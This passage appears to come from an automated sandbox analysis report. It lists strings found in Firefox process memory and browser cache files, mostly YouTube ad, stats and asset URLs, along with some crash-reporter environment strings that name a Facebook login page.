Source: places.sqlite-wal.51.dr	String found in binary or memory: Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.https://www.youtube.com/img/desktop/yt_1200.png equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Fc+"&aqi="+ba+"&ad_rmp="+ja+"&sli="+ja}],errorPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=videoplayfailed[ERRORCODE]"}],mutePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=admute&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ equals www.youtube.com (Youtube)
Source: favicons.sqlite-wal.51.dr	String found in binary or memory: Jhttps://www.youtube.com/s/desktop/80338919/img/favicon_144x144.png equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2996095013.0000026F5D9EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2994582235.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992986328.0000026F5DBBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: K("div",{class:"mini-app-splash-screen-view-model-wiz__loading-icon"},K(tt,null,function(){var D="loading_animation_"+c.value;yE({className:"mini-app-splash-screen-view-model-wiz__loading-icon-animation",lottiePlayerProps:{animationRef:d,animationConfig:{name:D,path:"https://www.gstatic.com/youtube/img/lottie/playables_loading_animation/"+D+".json",loop:!0,autoplay:!0}}})})),K("div",{class:"mini-app-splash-screen-view-model-wiz__timeout-message-container"},b.title&&K("h3",{class:"mini-app-splash-screen-view-model-wiz__timeout-heading"}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000026.00000002.2501703989.000002014DAA2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000026.00000003.2457423446.000002014DAA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: K0`0https://www.youtube.com --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Kb+"&of="+Bb+"&uga="+eb+"&vm="+Wc},videostatsDelayplayUrl:{baseUrl:"https://s.youtube.com/api/stats/delayplay?cl="+ic+"&docid="+y+"&ei="+ba+"&feature="+m+"&fexp="+Re+"&ns="+Ga+"&plid="+R+"&referrer=https%3A%2F%2Fwww.youtube.com%2F&sdetail=p%3A%2F&sourceid="+Cc+"&el="+ed+"&len="+Kb+"&of="+Bb+"&uga="+eb+"&vm="+Wc},videostatsWatchtimeUrl:{baseUrl:"https://s.youtube.com/api/stats/watchtime?cl="+ic+"&docid="+y+"&ei="+ba+"&feature="+m+"&fexp="+Re+"&ns="+Ga+"&plid="+R+"&referrer=https%3A%2F%2Fwww.youtube.com%2F&sdetail=p%3A%2F&sourceid="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.4727131464.0000020338F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4737168375.000002033A7A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.facebook.com/login equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.4718221427.0000020338D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.facebook.com/loginU equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2671832749.000002650D208000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.coml equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000003.2761334389.000002033A7EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2604866040.000002033A7EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4737168375.000002033A7EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MSAFD L2CAP [Bluetooth]MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.facebook.com/loginMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windowsl equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2672529573.000002650EEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ORTER_RESTART_ARG_1=https://www.youtube.comNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program5 equals www.youtube.com (Youtube)
Source: 69455E9F6ABEDFC78866EDEA94CB9D51C573A013.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994770537.0000026F5DBE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.NAGOkLXK6QY.L.F4.O/am=ABAK/d=0/rs=AGKMywGgbxMybDN_5kajT3XcTJKqzHlyjA equals www.youtube.com (Youtube)
Source: 33200725926A095B3A48EB9ABD6821C7F895DF65.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/desktop/80338919/cssbin/www-main-desktop-home-page-skeleton.css equals www.youtube.com (Youtube)
Source: 48D71C745420E717A699F4CC6847C17B6C743A51.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/desktop/80338919/img/favicon_144x144.png equals www.youtube.com (Youtube)
Source: 281D3362FC8DAA6BD8595A1C942DD405542AD365.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/desktop/80338919/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js equals www.youtube.com (Youtube)
Source: 70DE259D3055F51A1BEBD035A0E461EC8E9213A5.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/desktop/80338919/jsbin/www-tampering.vflset/www-tampering.js equals www.youtube.com (Youtube)
Source: 3D2EE65213655611AE063776EA786EF2A8F7901B.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/search/audio/failure.mp3 equals www.youtube.com (Youtube)
Source: D550D57BCFA88C4195E78095A742FAC7693FC54F.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,a,:https://www.gstatic.com/youtube/img/icons/web/youtube_fill/offline_download/v1/24px.svg equals www.youtube.com (Youtube)
Source: B41E3D0BA051DAFDC3F262CC45C5AE9165BC9508.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,a,:https://www.gstatic.com/youtube/img/icons/web/youtube_fill/play-arrow/v1/24px.svg equals www.youtube.com (Youtube)
Source: A988D8F5B0BF56AA1942EC62AFDF51C05C82139B.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,a,:https://www.gstatic.com/youtube/img/icons/web/youtube_fill/shorts-dislike/v2/32px.svg equals www.youtube.com (Youtube)
Source: AF10D6A6EDDDEAF586DD225969745155C8322254.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,a,:https://www.gstatic.com/youtube/img/icons/web/youtube_outline/refresh/v1/24px.svg equals www.youtube.com (Youtube)
Source: E4F97C21330F66B9CA5E2F70F052E141CB217EC8.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,~1705534510,:https://www.youtube.com/youtubei/v1/guide?key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8&prettyPrint=false equals www.youtube.com (Youtube)
Source: 629A321F0AC373A586B46A52889FEF90A2570B88.51.dr	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,~1705534511,:https://www.youtube.com/youtubei/v1/feedback?key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8&prettyPrint=false equals www.youtube.com (Youtube)
Source: 3055379122PCe7r%sCi7s%t3efndt9E.sqlite.51.dr	String found in binary or memory: PersistentEntityStoreDb:V5af29df3\|\|https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993278709.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992190171.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Uwb.prototype.openToast=function(){var a;null!=(a=this.currentToast)&&a.opened\|\|(this.queue.length?(this.currentToast=this.queue.shift(),this.currentToast.open()):this.currentPersistentToast&&this.currentPersistentToast.open())};var Xwb=new Lp("TOAST_MANAGER_TOKEN");var Ywb=["https://fonts.gstatic.com","https://www.gstatic.com","https://www.youtube.com"],Zwb=El("wil_icon_max_concurrent_fetches",Infinity),$wb=["clip-path","fill","mask"],eK=function(a,b){var c=this;this.iconSet=a;this.appDirection=b;this.responsePromises={};this.iconCache={};this.queuedResponseResolvers={};this.numFetches=0;this.cacheStorageAvailable=!!ya.caches;this.cacheStorageAsync=Promise.resolve(void 0);this.cacheStorageSync=void 0;this.requestAninmationFrameResolver=null;this.renderingMode= equals www.youtube.com (Youtube)
Source: Web Data.36.dr	String found in binary or memory: YouTubeyoutube.comhttps://www.youtube.com/favicon.icohttps://www.youtube.com/results?search_query={searchTerms}&page={startPage?}&utm_source=opensearchhttps://www.youtube.com/opensearch?locale=en_GB equals www.youtube.com (Youtube)
Source: Web Data.36.dr	String found in binary or memory: YouTubeyoutube.comhttps://www.youtube.com/favicon.icohttps://www.youtube.com/results?search_query={searchTerms}&page={startPage?}&utm_source=opensearchhttps://www.youtube.com/opensearch?locale=en_GB/m equals www.youtube.com (Youtube)
Source: 2171031483YattIedMb.sqlite.51.dr	String found in binary or memory: YtIdbMetahttps://www.youtube.com equals www.youtube.com (Youtube)
Source: chromecache_973.22.dr	String found in binary or memory: _.py(n);break;case "PuZJUb":a+="https://www.youtube.com/t/terms?chromeless=1&hl="+_.py(l);break;case "fxTQxb":a+="https://youtube.com/t/terms?gl="+_.py(_.xy(c))+"&hl="+_.py(d)+"&override_hl=1"+(f?"&linkless=1":"");break;case "prAmvd":a+="https://www.google.com/intl/"+_.py(l)+"/chromebook/termsofservice.html?languageCode="+_.py(d)+"&regionCode="+_.py(c);break;case "NfnTze":a+="https://policies.google.com/privacy/google-partners"+(f?"/embedded":"")+"?hl="+_.py(d)+"&gl="+_.py(c)+(g?"&color_scheme="+ equals www.youtube.com (Youtube)
Source: B41E3D0BA051DAFDC3F262CC45C5AE9165BC9508.51.dr, D550D57BCFA88C4195E78095A742FAC7693FC54F.51.dr, A988D8F5B0BF56AA1942EC62AFDF51C05C82139B.51.dr, AF10D6A6EDDDEAF586DD225969745155C8322254.51.dr	String found in binary or memory: access-control-allow-origin: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"LigQMVuP3nAx3LwQfSGhgYmqsEWANi"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"65",offsetEndMilliseconds:"30"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"51",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_G equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"LigQMVuP3nAx3LwQfSGhgYmqsEWANi"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"65",offsetEndMilliseconds:"30"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"51",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"LigQMVuP3nAx3LwQfSGhgYmqsEWANi"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_START",adTimeOffset:{offsetStartMilliseconds:"330100",offsetEndMilliseconds:"594666"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"0",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"by"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"73",offsetEndMilliseconds:"64"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"67",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"cn"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"59",offsetEndMilliseconds:"8"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"26",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"fp"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"66",offsetEndMilliseconds:"35"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"98",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"go"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"14",offsetEndMilliseconds:"87"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"79",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"nh"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_END",adTimeOffset:{offsetStartMilliseconds:"25",offsetEndMilliseconds:"13"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"32",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992774566.0000026F5DC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adSlotLoggingData:{serializedSlotAdServingDataEntry:"nl"}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:"50",offsetEndMilliseconds:"67"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"96",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.2